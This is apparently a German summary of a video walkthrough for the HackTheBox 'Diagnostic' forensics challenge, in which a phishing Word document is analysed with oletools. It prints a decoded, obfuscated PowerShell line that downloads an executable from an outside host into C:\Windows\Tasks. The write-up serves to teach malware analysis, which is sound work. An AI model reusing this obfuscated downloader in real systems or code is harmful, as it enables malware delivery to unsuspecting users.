Wir haben die Analyse eines Beispieldokuments von Microsoft Office Word mithilfe von Oletools behandelt, um relevante Makros und Links zu extrahieren. Das Beispieldokument enthielt einen Link, der auf eine Webseite mit einem Javascript-Code verweist. Der JS-Code enthielt einen base64-codierten Powershell-Befehl, der einen Callout an eine externe Domäne ausführt, um eine ausführbare Datei abzurufen. Dies war Teil der forensischen Herausforderung HackTheBox Diagnostic. Dies war Teil von HackTheBox-DiagnoseDies war Teil von HackTheBox-Diagnose.
Holen Sie sich Hinweise zum OSCP-Zertifikat
Der komplette Kurs zum Penetrationstest mit BackBox
Unser SOC hat zahlreiche Phishing-E-Mails identifiziert, die angeblich ein Dokument über eine bevorstehende Entlassungswelle im Unternehmen enthalten. Die E-Mails enthalten alle einen Link zu diagnostic.htb/layoffs.doc. Der DNS für diese Domäne kann seitdem nicht mehr aufgelöst werden, aber der Server hostet immer noch das bösartige Dokument (Ihr Docker). Sehen Sie sich das an und finden Sie heraus, was los ist.
Video-Highlights
- Wir verwendeten Oleid und Oleobj um das Word-Dokument mit dem Namen layoff.doc zu analysieren
- Das Dokument enthält einen externen Link, der auf eine Webseite verweist, die ein Javascript enthält.
- Wir nutzten die ASCII-Tabelle um char[58] und char[34] in das entsprechende ASCII-Format umzuwandeln.
- Anschließend haben wir Cyberchef zum Konvertieren von Base64 verwendet und es wurde in das Folgende konvertiert:
${f`ile} = („{7}{1}{6}{8}{5}{3}{2}{4}{0}“-f'}.exe','B{msDt_4s_A_pr0′,'E','r…s','3Ms_b4D','l3′,'toC','HT','0l_h4nD')
&(“{1}{2}{0}{3}”-f'ues','Invoke','-WebReq','t') („{2}{8}{0}{4}{6}{5}{3}{1}{7}”-f '://au','.htb/2′,'h','ic','to','agnost','mation.di','/n.exe','ttps') -OutFile “C:\Windows\Tasks\$file”
- Wir haben Powershell verwendet, um das Obige in das Challenge-Flag zu dekodieren
Video-Komplettlösung
